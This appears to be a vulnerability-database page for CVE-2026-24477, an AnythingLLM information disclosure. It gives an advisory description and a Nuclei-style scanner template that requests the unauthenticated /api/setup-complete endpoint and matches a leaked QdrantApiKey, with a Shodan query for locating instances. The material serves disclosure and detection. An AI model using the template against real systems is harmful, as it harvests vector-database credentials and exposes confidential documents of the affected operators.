CVE-2026-24477: AnythingLLM - Information Disclosure

2026-03-25 AnythingLLM PoC Public

Description

AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. If AnythingLLM prior to version 1.10.0 is configured to use Qdrant as the vector database with an API key, this QdrantApiKey could be exposed in plain text to unauthenticated users via the `/api/setup-complete` endpoint. Leakage of QdrantApiKey allows an unauthenticated attacker full read/write access to the Qdrant vector database instance used by AnythingLLM. Since Qdrant often stores the core knowledge base for RAG in AnythingLLM, this can lead to complete compromise of the semantic search / retrieval functionality and indirect leakage of confidential uploaded documents. Version 1.10.0 patches the issue.

PoC

id: CVE-2026-24477

info:
  name: AnythingLLM - Information Disclosure
  author: DhiyaneshDk
  severity: high
  description: |
    AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. If AnythingLLM prior to version 1.10.0 is configured to use Qdrant as the vector database with an API key, this QdrantApiKey could be exposed in plain text to unauthenticated users via the `/api/setup-complete` endpoint. Leakage of QdrantApiKey allows an unauthenticated attacker full read/write access to the Qdrant vector database instance used by AnythingLLM. Since Qdrant often stores the core knowledge base for RAG in AnythingLLM, this can lead to complete compromise of the semantic search / retrieval functionality and indirect leakage of confidential uploaded documents. Version 1.10.0 patches the issue.
  impact: |
    Unauthenticated attackers can read and write to the Qdrant database, compromising semantic search and leaking confidential documents.
  remediation: |
    Update to version 1.10.0 or later.
  reference:
    - https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-gm94-qc2p-xcwf
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24477
  metadata:
    verified: true
    max-request: 1
    shodan-query: "anythingllm"
  tags: cve,cve2026,anything-llm,info-leak,api,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/setup-complete"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"QdrantApiKey":'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ff5f7e88a5be9d740918721a4737d9e4a5faf7a068d2edda6076d0677b1d74e402210094533cdab3de7441c903bd07498fc94637f5418b8fabb235413b24a37930f57d:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities